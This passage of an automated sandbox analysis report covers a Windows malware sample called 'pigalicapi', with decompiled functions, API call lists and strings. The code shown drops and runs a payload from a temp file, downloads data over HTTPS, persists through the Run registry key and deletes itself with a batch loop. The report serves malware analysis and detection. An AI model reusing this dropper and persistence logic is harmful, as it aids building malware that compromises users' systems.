                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00EC767C
                                                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,slf,00000000), ref: 00EC7698
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,.bat), ref: 00EC76AA
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00EC76C6
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000000), ref: 00EC76F9
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000), ref: 00EC770E
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00EC771B
                                                                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00EC778C
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00EC779D
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00EC77A5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$lstrcat$Close$CreateHandleNameProcess$AttributesCountDeleteDirectoryEnvironmentExitModuleOpenProfileSleepTempTerminateThreadTickUsersValueVariableWritelstrlenwnsprintf
                                                                                                                                                                                                                                                    • String ID: .bat$.exe$:repeatdel %sif exist %s goto :repeatdel %%0$D$TEMP$USERPROFILE$pigalicapi$slf$software\microsoft\windows\currentversion\run
                                                                                                                                                                                                                                                    • API String ID: 3221898725-1842671280
                                                                                                                                                                                                                                                    • Opcode ID: 7c254d95468b8894205cbea27cb94d89969c63a55af2531d6f4c03e8bdcbd10e
                                                                                                                                                                                                                                                    • Instruction ID: 4be157d8f0eb9c8c4970bcfdd36fa12f9be5dfb7c73895e4a10eeee86ab03e52
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c254d95468b8894205cbea27cb94d89969c63a55af2531d6f4c03e8bdcbd10e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7471A7B1941318AFEB20DB61DD4AFEA7778AB48704F14519CF20DB50D1DBB25A8ACF50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                                    			E00EC6DA0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                    				intOrPtr* _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v40;
                                                                                                                                                                                                                                                    				long _v44;
                                                                                                                                                                                                                                                    				void* _v48;
                                                                                                                                                                                                                                                    				void* _v52;
                                                                                                                                                                                                                                                    				void* _v56;
                                                                                                                                                                                                                                                    				char _v324;
                                                                                                                                                                                                                                                    				void* _v328;
                                                                                                                                                                                                                                                    				char _v340;
                                                                                                                                                                                                                                                    				char _v604;
                                                                                                                                                                                                                                                    				long _v608;
                                                                                                                                                                                                                                                    				int _v612;
                                                                                                                                                                                                                                                    				long _v616;
                                                                                                                                                                                                                                                    				void* _v620;
                                                                                                                                                                                                                                                    				long _v624;
                                                                                                                                                                                                                                                    				intOrPtr _v628;
                                                                                                                                                                                                                                                    				void* _v632;
                                                                                                                                                                                                                                                    				intOrPtr _t198;
                                                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _t217;
                                                                                                                                                                                                                                                    				void* _t223;
                                                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _t248;
                                                                                                                                                                                                                                                    				void* _t347;
                                                                                                                                                                                                                                                    				void* _t349;
                                                                                                                                                                                                                                                    				void* _t350;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = _a4;
                                                                                                                                                                                                                                                    				if(_v8 == 0) {
                                                                                                                                                                                                                                                    					L39:
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				Sleep( *(_v8 + 0x14) * 0x3c * 0x3e8);
                                                                                                                                                                                                                                                    				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                    				_v32 =  *_v8;
                                                                                                                                                                                                                                                    				_v28 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                                                                                                                    				_v24 =  *((intOrPtr*)(_v8 + 8));
                                                                                                                                                                                                                                                    				_v12 =  *(_v8 + 0x14);
                                                                                                                                                                                                                                                    				_v20 =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                    				_v16 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                                                                                                    				if(( *(_v8 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                    					GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                    					E00EC7D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                    					E00EC9730( &_v340, 4);
                                                                                                                                                                                                                                                    					_t349 = _t347 + 0x14;
                                                                                                                                                                                                                                                    					GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                    					_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                    					if(_v328 != 0xffffffff) {
                                                                                                                                                                                                                                                    						_v608 = 0;
                                                                                                                                                                                                                                                    						_v612 = 0;
                                                                                                                                                                                                                                                    						_v616 =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                    						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                    							_v612 = WriteFile(_v328,  *(_v8 + 0x18),  *(_v8 + 0x1c),  &_v608, 0);
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_v624 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                    							_v620 = VirtualAlloc(0, _v624, 0x3000, 4);
                                                                                                                                                                                                                                                    							if(_v620 != 0) {
                                                                                                                                                                                                                                                    								if(E00EC6260(_v8,  *(_v8 + 0x18),  *(_v8 + 0x1c), _v620, _v624) == _v624) {
                                                                                                                                                                                                                                                    									_v612 = WriteFile(_v328, _v620, _v624,  &_v608, 0);
                                                                                                                                                                                                                                                    									_v616 = _v624;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								VirtualFree(_v620, 0, 0x8000);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						CloseHandle(_v328);
                                                                                                                                                                                                                                                    						if(_v612 != 0 && _v608 == _v616) {
                                                                                                                                                                                                                                                    							_t198 = E00EC1E60( &_v324);
                                                                                                                                                                                                                                                    							_t350 = _t349 + 4;
                                                                                                                                                                                                                                                    							_v628 = _t198;
                                                                                                                                                                                                                                                    							if(_v628 != 0) {
                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                    									E00EC73C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                    									_t350 = _t350 + 0xc;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                    									E00EC2510(_v628, 0xece290);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L38:
                                                                                                                                                                                                                                                    					__imp__CoUninitialize();
                                                                                                                                                                                                                                                    					goto L39;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                                                                                                    				if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                    					_t217 = E00EC2070( *(_v8 + 0x18));
                                                                                                                                                                                                                                                    					_t347 = _t347 + 4;
                                                                                                                                                                                                                                                    					_v40 = _t217;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v44 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                    					_v48 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                    					if(_v48 != 0) {
                                                                                                                                                                                                                                                    						if(E00EC6260( *(_v8 + 0x1c),  *(_v8 + 0x18),  *(_v8 + 0x1c), _v48, _v44) == _v44) {
                                                                                                                                                                                                                                                    							_t248 = E00EC2070(_v48);
                                                                                                                                                                                                                                                    							_t347 = _t347 + 4;
                                                                                                                                                                                                                                                    							_v40 = _t248;
                                                                                                                                                                                                                                                    							if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                    								_v36 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                    								E00EC7B70(_v36, _v48, _v44);
                                                                                                                                                                                                                                                    								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						VirtualFree(_v48, 0, 0x8000);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if(_v40 == 0) {
                                                                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                                                                    					goto L38;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                    						E00EC73C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                    						_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                    						_t223 = E00EC97A0(0x10);
                                                                                                                                                                                                                                                    						_t347 = _t347 + 4;
                                                                                                                                                                                                                                                    						_v632 = _t223;
                                                                                                                                                                                                                                                    						_v52 = _v632;
                                                                                                                                                                                                                                                    						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                    							 *_v52 = VirtualAlloc(0,  *(_v8 + 0x1c), 0x3000, 4);
                                                                                                                                                                                                                                                    							if( *_v52 != 0) {
                                                                                                                                                                                                                                                    								E00EC7B70( *_v52,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                    								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                    								 *(_v52 + 4) =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							 *_v52 = _v36;
                                                                                                                                                                                                                                                    							 *(_v52 + 4) = _v44;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						if( *_v52 != 0) {
                                                                                                                                                                                                                                                    							 *(_v52 + 8) =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_v52 + 0xc)) = _v40;
                                                                                                                                                                                                                                                    							_v56 = CreateThread(0, 0, E00EC77B0, _v52, 0, 0);
                                                                                                                                                                                                                                                    							CloseHandle(_v56);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                    						E00EC2510(_v40, 0xece290);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}


































                                                                                                                                                                                                                                                    0x00ec6dac
                                                                                                                                                                                                                                                    0x00ec6db3
                                                                                                                                                                                                                                                    0x00ec723f
                                                                                                                                                                                                                                                    0x00ec7244
                                                                                                                                                                                                                                                    0x00ec7244
                                                                                                                                                                                                                                                    0x00ec6dc9
                                                                                                                                                                                                                                                    0x00ec6dd1
                                                                                                                                                                                                                                                    0x00ec6ddc
                                                                                                                                                                                                                                                    0x00ec6de5
                                                                                                                                                                                                                                                    0x00ec6dee
                                                                                                                                                                                                                                                    0x00ec6df7
                                                                                                                                                                                                                                                    0x00ec6e00
                                                                                                                                                                                                                                                    0x00ec6e09
                                                                                                                                                                                                                                                    0x00ec6e15
                                                                                                                                                                                                                                                    0x00ec7028
                                                                                                                                                                                                                                                    0x00ec7039
                                                                                                                                                                                                                                                    0x00ec704a
                                                                                                                                                                                                                                                    0x00ec704f
                                                                                                                                                                                                                                                    0x00ec7077
                                                                                                                                                                                                                                                    0x00ec7099
                                                                                                                                                                                                                                                    0x00ec70a6
                                                                                                                                                                                                                                                    0x00ec70ac
                                                                                                                                                                                                                                                    0x00ec70b6
                                                                                                                                                                                                                                                    0x00ec70c6
                                                                                                                                                                                                                                                    0x00ec70d5
                                                                                                                                                                                                                                                    0x00ec71af
                                                                                                                                                                                                                                                    0x00ec70db
                                                                                                                                                                                                                                                    0x00ec70eb
                                                                                                                                                                                                                                                    0x00ec7107
                                                                                                                                                                                                                                                    0x00ec7114
                                                                                                                                                                                                                                                    0x00ec713d
                                                                                                                                                                                                                                                    0x00ec7163
                                                                                                                                                                                                                                                    0x00ec716f
                                                                                                                                                                                                                                                    0x00ec716f
                                                                                                                                                                                                                                                    0x00ec7183
                                                                                                                                                                                                                                                    0x00ec7183
                                                                                                                                                                                                                                                    0x00ec7189
                                                                                                                                                                                                                                                    0x00ec71bc
                                                                                                                                                                                                                                                    0x00ec71c9
                                                                                                                                                                                                                                                    0x00ec71e0
                                                                                                                                                                                                                                                    0x00ec71e5
                                                                                                                                                                                                                                                    0x00ec71e8
                                                                                                                                                                                                                                                    0x00ec71f5
                                                                                                                                                                                                                                                    0x00ec71fe
                                                                                                                                                                                                                                                    0x00ec7212
                                                                                                                                                                                                                                                    0x00ec7217
                                                                                                                                                                                                                                                    0x00ec7217
                                                                                                                                                                                                                                                    0x00ec7223
                                                                                                                                                                                                                                                    0x00ec7231
                                                                                                                                                                                                                                                    0x00ec7236
                                                                                                                                                                                                                                                    0x00ec7223
                                                                                                                                                                                                                                                    0x00ec71f5
                                                                                                                                                                                                                                                    0x00ec71c9
                                                                                                                                                                                                                                                    0x00ec7239
                                                                                                                                                                                                                                                    0x00ec7239
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec7239
                                                                                                                                                                                                                                                    0x00ec6e1b
                                                                                                                                                                                                                                                    0x00ec6e22
                                                                                                                                                                                                                                                    0x00ec6e29
                                                                                                                                                                                                                                                    0x00ec6e39
                                                                                                                                                                                                                                                    0x00ec6eec
                                                                                                                                                                                                                                                    0x00ec6ef1
                                                                                                                                                                                                                                                    0x00ec6ef4
                                                                                                                                                                                                                                                    0x00ec6e3f
                                                                                                                                                                                                                                                    0x00ec6e4f
                                                                                                                                                                                                                                                    0x00ec6e65
                                                                                                                                                                                                                                                    0x00ec6e6c
                                                                                                                                                                                                                                                    0x00ec6e8c
                                                                                                                                                                                                                                                    0x00ec6e92
                                                                                                                                                                                                                                                    0x00ec6e97
                                                                                                                                                                                                                                                    0x00ec6e9a
                                                                                                                                                                                                                                                    0x00ec6ea6
                                                                                                                                                                                                                                                    0x00ec6ebb
                                                                                                                                                                                                                                                    0x00ec6eca
                                                                                                                                                                                                                                                    0x00ec6ecf
                                                                                                                                                                                                                                                    0x00ec6ecf
                                                                                                                                                                                                                                                    0x00ec6ea6
                                                                                                                                                                                                                                                    0x00ec6edd
                                                                                                                                                                                                                                                    0x00ec6edd
                                                                                                                                                                                                                                                    0x00ec6ee3
                                                                                                                                                                                                                                                    0x00ec6efb
                                                                                                                                                                                                                                                    0x00ec7012
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec6f01
                                                                                                                                                                                                                                                    0x00ec6f08
                                                                                                                                                                                                                                                    0x00ec6f1c
                                                                                                                                                                                                                                                    0x00ec6f21
                                                                                                                                                                                                                                                    0x00ec6f21
                                                                                                                                                                                                                                                    0x00ec6f2d
                                                                                                                                                                                                                                                    0x00ec6f35
                                                                                                                                                                                                                                                    0x00ec6f3a
                                                                                                                                                                                                                                                    0x00ec6f3d
                                                                                                                                                                                                                                                    0x00ec6f49
                                                                                                                                                                                                                                                    0x00ec6f55
                                                                                                                                                                                                                                                    0x00ec6f83
                                                                                                                                                                                                                                                    0x00ec6f8b
                                                                                                                                                                                                                                                    0x00ec6fa1
                                                                                                                                                                                                                                                    0x00ec6fa6
                                                                                                                                                                                                                                                    0x00ec6fb2
                                                                                                                                                                                                                                                    0x00ec6fb2
                                                                                                                                                                                                                                                    0x00ec6f57
                                                                                                                                                                                                                                                    0x00ec6f5d
                                                                                                                                                                                                                                                    0x00ec6f65
                                                                                                                                                                                                                                                    0x00ec6f65
                                                                                                                                                                                                                                                    0x00ec6fbb
                                                                                                                                                                                                                                                    0x00ec6fc6
                                                                                                                                                                                                                                                    0x00ec6fcf
                                                                                                                                                                                                                                                    0x00ec6fe9
                                                                                                                                                                                                                                                    0x00ec6ff0
                                                                                                                                                                                                                                                    0x00ec6ff0
                                                                                                                                                                                                                                                    0x00ec6fbb
                                                                                                                                                                                                                                                    0x00ec6fff
                                                                                                                                                                                                                                                    0x00ec700a
                                                                                                                                                                                                                                                    0x00ec700f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec6fff

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(?), ref: 00EC6DC9
                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00EC6DD1
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00EC6E5F
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000), ref: 00EC6EB5
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,00000000), ref: 00EC6EDD
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00EC6F7A
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 00EC6FE3
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00EC6FF0
                                                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 00EC7028
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00EC7059
                                                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,?,00000000), ref: 00EC7077
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00EC7093
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00EC7101
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000,?,?,00000000,?), ref: 00EC715D
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 00EC7183
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 00EC71A9
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00EC71BC
                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00EC7239
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$AllocFile$CloseCreateFreeHandleWrite$CountEnvironmentInitializeNameSleepTempThreadTickUninitializeVariable
                                                                                                                                                                                                                                                    • String ID: TEMP
                                                                                                                                                                                                                                                    • API String ID: 3110491842-1036413054
                                                                                                                                                                                                                                                    • Opcode ID: ba7ef9b781f52c85d1e7e7dd91eca4bbdc6ba9a9be0a27f73d293efe039f5396
                                                                                                                                                                                                                                                    • Instruction ID: da46eddfafa3a955a49aa8e49bd80b191b7d49990fb08444f26cc10029e1b1e5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba7ef9b781f52c85d1e7e7dd91eca4bbdc6ba9a9be0a27f73d293efe039f5396
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F12DB5A00208EFDB18CF94D995F9EB7B5BB48304F248198E509BB391D732AE42DF50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC2900(char* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                    				CHAR* _v28;
                                                                                                                                                                                                                                                    				char _v292;
                                                                                                                                                                                                                                                    				void _v296;
                                                                                                                                                                                                                                                    				void* _v300;
                                                                                                                                                                                                                                                    				long _v304;
                                                                                                                                                                                                                                                    				long _v308;
                                                                                                                                                                                                                                                    				char* _t54;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                    					_t54 = E00ECE004; // 0xecc398
                                                                                                                                                                                                                                                    					_v12 = InternetOpenA(_t54, 1, 0, 0, 0);
                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                    						_v16 = InternetConnectA(_v12, _a4, 0x1bb, 0xecc3d2, 0xecc3d1, 3, 0, 0);
                                                                                                                                                                                                                                                    						if(_v16 != 0) {
                                                                                                                                                                                                                                                    							_v20 = HttpOpenRequestA(_v16, "GET", "/", "1.1", 0, 0, 0x80800000, 0);
                                                                                                                                                                                                                                                    							if(_v20 != 0) {
                                                                                                                                                                                                                                                    								wsprintfA( &_v292, "https://%s", _a4);
                                                                                                                                                                                                                                                    								_v28 = "Accept: */*";
                                                                                                                                                                                                                                                    								_v24 = 4;
                                                                                                                                                                                                                                                    								InternetQueryOptionA(_v20, 0x1f,  &_v296,  &_v24);
                                                                                                                                                                                                                                                    								_v296 = _v296 | 0x0000b180;
                                                                                                                                                                                                                                                    								InternetSetOptionA(_v20, 0x1f,  &_v296, 4);
                                                                                                                                                                                                                                                    								if(HttpSendRequestA(_v20, _v28, lstrlenA(_v28), 0, 0) == 0) {
                                                                                                                                                                                                                                                    									_v308 = GetLastError();
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_v300 = 0;
                                                                                                                                                                                                                                                    									while(_v300 < _a12) {
                                                                                                                                                                                                                                                    										_v304 = 0;
                                                                                                                                                                                                                                                    										InternetReadFile(_v20, _a8 + _v300, _a12 - _v300,  &_v304);
                                                                                                                                                                                                                                                    										if(_v304 != 0) {
                                                                                                                                                                                                                                                    											_v300 = _v300 + _v304;
                                                                                                                                                                                                                                                    											 *(_a8 + _v300) = 0;
                                                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_v8 = _v300;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								InternetCloseHandle(_v20);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							InternetCloseHandle(_v16);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						InternetCloseHandle(_v12);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                                    0x00ec2909
                                                                                                                                                                                                                                                    0x00ec2914
                                                                                                                                                                                                                                                    0x00ec2936
                                                                                                                                                                                                                                                    0x00ec2942
                                                                                                                                                                                                                                                    0x00ec2949
                                                                                                                                                                                                                                                    0x00ec2972
                                                                                                                                                                                                                                                    0x00ec2979
                                                                                                                                                                                                                                                    0x00ec29a3
                                                                                                                                                                                                                                                    0x00ec29aa
                                                                                                                                                                                                                                                    0x00ec29c0
                                                                                                                                                                                                                                                    0x00ec29c9
                                                                                                                                                                                                                                                    0x00ec29d0
                                                                                                                                                                                                                                                    0x00ec29e8
                                                                                                                                                                                                                                                    0x00ec29f9
                                                                                                                                                                                                                                                    0x00ec2a0e
                                                                                                                                                                                                                                                    0x00ec2a33
                                                                                                                                                                                                                                                    0x00ec2ab5
                                                                                                                                                                                                                                                    0x00ec2a35
                                                                                                                                                                                                                                                    0x00ec2a35
                                                                                                                                                                                                                                                    0x00ec2a3f
                                                                                                                                                                                                                                                    0x00ec2a4a
                                                                                                                                                                                                                                                    0x00ec2a73
                                                                                                                                                                                                                                                    0x00ec2a80
                                                                                                                                                                                                                                                    0x00ec2a90
                                                                                                                                                                                                                                                    0x00ec2a9f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2a82
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2a80
                                                                                                                                                                                                                                                    0x00ec2aaa
                                                                                                                                                                                                                                                    0x00ec2aaa
                                                                                                                                                                                                                                                    0x00ec2acb
                                                                                                                                                                                                                                                    0x00ec2acb
                                                                                                                                                                                                                                                    0x00ec2ad5
                                                                                                                                                                                                                                                    0x00ec2ad5
                                                                                                                                                                                                                                                    0x00ec2adf
                                                                                                                                                                                                                                                    0x00ec2adf
                                                                                                                                                                                                                                                    0x00ec2949
                                                                                                                                                                                                                                                    0x00ec2aeb

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00ECC398,00000001,00000000,00000000,00000000), ref: 00EC293C
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,00000000,000001BB,00ECC3D2,00ECC3D1,00000003,00000000,00000000), ref: 00EC296C
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,00ECC3D8,1.1,00000000,00000000,80800000,00000000), ref: 00EC299D
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00EC29C0
                                                                                                                                                                                                                                                    • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EC29E8
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EC2A0E
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Accept: */*,00000000,00000000), ref: 00EC2A1C
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,Accept: */*,00000000), ref: 00EC2A2B
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 00EC2A73
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00EC2AAF
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00EC2ACB
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00EC2AD5
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00EC2ADF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$HttpOpenOptionRequest$ConnectErrorFileLastQueryReadSendlstrlenwsprintf
                                                                                                                                                                                                                                                    • String ID: 1.1$Accept: */*$GET$https://%s
                                                                                                                                                                                                                                                    • API String ID: 2082764430-47765423
                                                                                                                                                                                                                                                    • Opcode ID: 87b5797d52ace0c90ef831f7b8f5d1692c77a80e91359cc94c291b188afdef9f
                                                                                                                                                                                                                                                    • Instruction ID: 543661d296579d6c15ff7391f1999618522b3f8b88759d9d6c8e576556303943
